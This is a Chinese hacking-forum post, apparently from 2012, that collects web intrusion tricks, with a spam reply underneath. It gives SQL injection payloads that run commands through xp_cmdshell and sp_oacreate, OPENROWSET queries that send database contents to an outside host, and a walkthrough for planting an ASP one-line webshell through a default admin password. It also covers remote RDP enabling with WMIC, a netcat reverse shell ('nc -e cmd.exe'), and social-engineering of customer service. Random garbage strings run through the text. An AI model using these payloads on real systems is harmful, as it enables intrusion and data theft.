找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3226|回复: 1
打印 上一主题 下一主题

站库分离的方法

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:41:29 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
SA点数据库分离技术相关
4 @! ^; z0 S- a4 x- d- ]: G* J  [6 T& M' _' r' m: Z; e* }
) T" R. S; u8 y0 s" t2 v: a9 }; `
SA点数据库分离搞法+语句:
8 E$ b+ ]  t4 _. y% h+ s
+ s# V7 \# l' p. H1 ]6 E4 X' _注射点不显错,执行下面三条语句页面都返回正常。
: [7 D, k: h; [6 mand 1=(select count(*) FROM master.dbo.sysobjects where name= 'xp_regread')
5 k# t# D$ g, W# W+ b6 ]and 1=(select count(*) FROM master.dbo.sysobjects where name= 'sp_makewebtask'). B7 t$ m0 l( ?8 Z
and 1=(select count(*) FROM master.dbo.sysobjects where xtype = 'X' AND name = 'xp_cmdshell')9 X2 Z& P3 W& p6 e& Y
可以列目录,判断系统为2000,web与数据库分离; n/ G, S& o, W+ c* `2 R
遇到这种情况首先要想办法得到数据库IP来进行下一步得渗透了。
3 R# G0 g  |# w- A1 t在注射点上执行
1 F" M8 i$ l8 U+ t+ J5 E5 kdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd /c net user ';--% x9 p: g# J) ~; M# Y
页面返回正常,通过上面这个命令执行telnet我一个外网肉鸡得1433端口,然后netstat/an没有得到IP
5 k& c$ l6 q; _还有我用NC监听得其他端口都没有得到IP。! j# T+ L& a/ W: C; l9 [
! D) u( D6 }1 e8 ~# J: |! r" C4 q
通过注射点执行下面这两个命令页面都返回异常,在肉鸡上面同样也是没有得到IP。" D0 g4 a% }$ I- M0 O" R
'insert into opendatasource('sqloledb','server=xxx.xxx.xxx.xxx;uid=sasa;pwd=sasa;database=tempdb').tempdb.dbo.temp select name from master.dbo.sysdatabases--- [0 @8 e# M2 P# X
/ {# {9 U! @% y6 G' d! a1 n
;insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=pass;Network=DBMSSOCN;Address=xxx.xxx.xxx.xxx,1433;', 'select * from dest_table') select * from src_table;--/ s) Q  k8 f$ ?# L8 F: z

5 G$ w' @' t9 w$ ~现在就猜想是不是数据库是内网而且不能连外网。4 T) G2 p9 l( M* _* w5 }" J
+ }* k0 @- m0 g, K  y; k

$ v" R0 l7 u# h" r- M' m0 r# baccess导出txt文本代码) }6 k0 }. w" ?
SELECT * into [test.txt] in 'd:\web\' 'text;' from admin
1 ^6 i+ l: E( P3 }4 Y8 O; e1 M% B2 ^1 `) D. d$ B" a1 J7 O# E
" g+ I5 a7 k! G. L8 Q: x
1 M( K3 B1 D; U, z  D! z6 S. v
自动跳转到指定网站代码头
! T" z5 J: }$ M; ]  u<body onload='vbscript:document.links(0).href="http://www.google.com":document.links(0).innerHTML="www.sohu.com"'>' t$ l6 W6 B: _3 h

" }9 Z' C' H& P" r8 Q* f. X
" [% h. `3 q+ c9 R, z! _入侵java or jsp站点时默认配置文件路径:
2 [+ I- H$ {5 d$ ^  r2 L\web-inf\web.xml
7 o6 c  |3 h; y$ M0 R! {8 x' vtomcat下的配置文件位置:
4 B5 u9 w: l" ~, a. O8 E\conf\server.xml            (前面加上tomcat路径)5 N9 t2 w" X! w. ?! S7 V
\Tomcat 5.0\webapps\root\web-inf\struts-config.xml4 l; M/ n! G" D6 W: l1 `7 I2 N; w4 s

9 |: f' A, [, S. H3 r: s; B9 b$ D3 F+ ]

4 K6 O2 t/ r4 S+ K  p检测注入点新方法运算符法,在过滤了and or cookies时用比有效果:+ ?- J" a  A1 _
-1%23, w* [. x; Y# m' j
>
3 }2 W2 h7 {) b& R<# a) n5 j4 L% t) a2 _: B
1'+or+'1'='1
! I& k& J4 ^0 C4 |id=8%bf1 f& w) w; g4 [. s8 c
0 @" \1 U& p9 J4 g
全新注入点检测试法:" X  d" z3 K' i) J
在URL地址后面加上-1,URL变成:http://gzkb.goomoo.cn/news.asp?id=123-1,如果返回的页面和前面不同,是另一则新闻,则表示有注入漏洞,是数字型的注入漏洞;在 URL地址后面加上 -0,URL变成 http://gzkb.goomoo.cn/news.asp?id=123-0,返回的页面和前面的页面相同,加上-1,返回错误页面,则也表示存在注入漏洞,是数字型的。5 Z0 ?; }3 P7 U" a; A

# i- t2 E+ K0 `$ m7 [" h在URL的地址后面加上'%2B',URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2B',返回的页面和1同;加上'2%2B'asdf,URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2Basdf,返回的页面和1不同,或者说未发现该条记录,或者错误,则表示存在注入点,是文本型的。* a( e1 F3 ^% R

" O9 y$ |6 W0 ?搜索型注入判断方法:
8 ?  A; }3 |& c. H- O; d北京%' and '1'='1' and '%'=': S5 n% c4 g5 v' o8 V
北京%' and '1'='2' and '%'='
, P) E( ]! n0 c" }7 h7 D
# N) `3 K; [0 O6 u- v4 i( {! a; d+ w* o% Q/ g) _& a- v' j! k; C. }
COOKIES注入:5 V5 T. K  Q9 i* _
) [. B# i3 ?0 E& W; `* w
javascript:alert(document.cookie="id="+escape("51 and 1=1"));
8 ]( H' v0 |' L; M+ L+ s1 ^% v/ s, E$ Z( E1 M
2000专业版查看本地登录用户命令:
2 L( K' u4 r2 ^, ynet config workstation( ]+ ~0 N* K7 K0 F6 N3 _5 }

1 Z+ p/ v6 C, x, [' A5 k8 ^: k8 L* Q$ t
2003下查看ipsec配置和默认防火墙配置命令:
- j+ p0 `& i1 N! f3 {7 fnetsh firewall show config
: i! y" q9 P1 o! W8 N: unetsh ipsec static show all
" [4 v$ O0 }. t0 |
# g/ n! |: _5 ?" c* t不指派指定策略命令:
3 O+ z: n2 V$ @2 c/ Q4 snetsh ipsec static set policy name=test assign=n  (test是不指派的策略名). k5 X* ]  n0 s# t
netsh ipsec static show policy all  显示策略名
0 U$ X3 ~  I4 J# @2 F/ q1 `3 \2 m; s; J; h( N$ T
0 h7 ^& B7 ?: {+ o
猜管理员后台小技巧:9 R1 U; `3 Z0 F7 c5 P" O
admin/left.asp
9 e# l3 D5 E" `3 C7 H. W" G  kadmin/main.asp
' c6 w+ E- B! z' q6 l0 f% dadmin/top.asp
, ^1 Q& q+ D  C3 L. T8 x) ?8 F) Aadmin/admin.asp
2 \" Y. H( i+ l+ J' z会现出菜单导航,然后迅雷下载全部链接, s# _: M/ t9 S' u- u: U

5 K9 j4 u4 p' t5 W8 `) G, U3 z1 I' l& Q! @( c
社会工程学:1 g% @. n' S, t0 `
用这个查信息 http://tool.chinaz.com/ Whois查域名注册人和维护人4 S( u5 e: p) n$ N# ~
然后去骗客服: x9 j3 @8 C; _  ]. D: {5 p
' `) K) B! P5 G  @
8 Q9 u3 r1 f% g! A
统计系统使用的是IT学习者的统计系统,在网上下载了一套回来研究。这样的系统拿webshell一般就二种:1.数据库插一句话木马,客户端连接得到。2.网站配置页面写入木马代码拿webshell。打开数据库目录,发现数据库扩展名是asp的,默认路径:data/#ITlearner.asp,把数据库扩展名改成*.mdb,用明小子的数据库工具打开,发现有防下载的表。管理员的默认密码是:ITlearner。数据库插一句话木马这条路是走不通了,现在只有看第二种方法看行不。输入默认密码进入 http://www.cnc-XX.com/admin/cutecounter /admin.asp?action=ShowConfig,查看原代码:
1 T& K* J# w0 d- F1 s查找 修改maxlength="3"为maxlength="100">这里是为了突破固定长度的字符输入。然后查找 处 修改为action="http://www.cnc-XX.com/admin/cutecounter/admin?Action=SaveConfig">,
1 |( I3 s" v+ U, [: ^$ L  存为html文件打开后在最后详细来访信息记录多少条记录,默认为100条框输入100:eval request(chr(35)),点击保存。提示无法找到,结果发现。  m% g6 C$ E# j- [; Z0 N
4 @! L8 ^& H+ `6 r" \  ]

) a/ Q# p  ]: Q. ]0 t) B0 H) U& i/ D- f1 @' i. t4 q; d
6. 554端口 用real554.exe入侵。 6129端口 用dameware6129.exe入侵。 系统漏洞 利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞, 进行溢出入侵。 3127等端口 可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)5 J  N- X* B" f: c

- |- i# R7 ~: s
! l7 ~/ j$ w! B2 @! }4 I8 b$ v) t" H% Z/ l% ^  a9 a
CMD加密注册表位置3 Q( M4 @3 {6 F/ N% }3 W
(1)HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor3 r. V. H. b/ Y, _  t
AutoRun
- g( e; ^" ~" E; B! G5 m; @7 p4 V+ g' a; P
(2)HKEY_CURRENT_USER\Software\Microsoft\Command Processor8 s- f0 b* E3 F* P# ?
AutoRun' `) l$ @  b% u  u
9 A0 d" q1 C2 \! i; N6 S

0 n1 I& I0 Z0 G4 {) F( y- Z在找注入时搜索Hidden,把他改成test
/ c2 r4 Z" P/ M1 X$ f3 I8 x# T- M: T

1 s2 r5 I! o6 N. X; u7 F8 W4 T
; \$ _' O! f1 o- M! ]1 }mstsc /v:IP /console 5 I9 S% `& k: R$ Z+ l6 a
7 ~" o& Q1 Z8 q/ m7 L0 _& h# |( Y

. j) I! y% X" r/ e7 t9 ~+ E一句话开3389:/ Y: _9 }* ]. W+ N  d

  l! H; ~) i0 O& o- A+ }* |* Q, i( a最近我在网上看到新出了一种方法,一句话开3389,不过好像听说只能用于2003系统,唉,还是写出来和大家分享一下吧.很简单的,wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1 adh=Kp e!w 8 kw`=wSH>  
' [/ d5 ~4 t( Q: x, u! V开远程:WMIC /node:"远程机器名" /user:"administrator" /password:"lcx" RDTOGGLE WHERE ServerName='远程机器名' call SetAllowTSConnections 1          就是这样了,其实还有其他的一些方法开2003的3389,我这里也不多作介绍了,大家有空上网一查就知道了.) z& l( ]/ P0 U' A' i
% r' l* g; C2 ~; d6 S

( |4 i" C4 Z& E) X+ W6 J2 _知道表名,字段,使用SQL语句在ACCESS数据库中加个用户名及密码语句如下:
  X" l4 a! \  K4 _Insert into admin(user,pwd) values('test','test')( s" P  ~, M; e& E) T1 H% K: _

- R( p" p9 o* B& |) I$ G5 T5 w* ?# `# p
NC反弹
' V. H+ Q2 m3 P: w- `  C先在本机执行:     nc -vv -lp 监听的端口     (自己执行)   0 v2 ]) z/ @8 n1 M. G5 L
然后在服务器上执行:  nc -e cmd.exe 自己的IP 和监听的端口 (对方执行)9 b6 ?7 x" k- \5 D, X) B

: N, _: C- ^5 M6 W3 c5 L% c% d9 u: l
1 [8 e3 P& V7 c. N" o在脚本入侵过程中要经常常试用%00来确认下参数是否有问题
/ G# c4 o3 d, Y1 Q  Y7 V6 m* \4 e* l% n
有时候我们入侵的时候,在webshell没有办法列举网站的目录包括dir也不行的时候,这个时候可以尝试用DOS命令SUBST转移目录
, V1 x. G. o+ G6 P! q# \! P例如:  S* _- j( o+ a; R: g4 j# T
subst k: d:\www\ 用d盘www目录替代k盘" R' [- _& s) T& i  x2 G. L
subst k: /d  解除K盘代替
回复

使用道具 举报

沙发
匿名  发表于 2017-12-20 02:36:51
We are a group of volunteers and starting a new scheme in our community.
Your web site offered us with valuable information to work on. You've done a formidable job and our entire community will
be grateful to you.
Website: Antispur Duo Forte proprieta
回复 支持 反对

使用道具

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表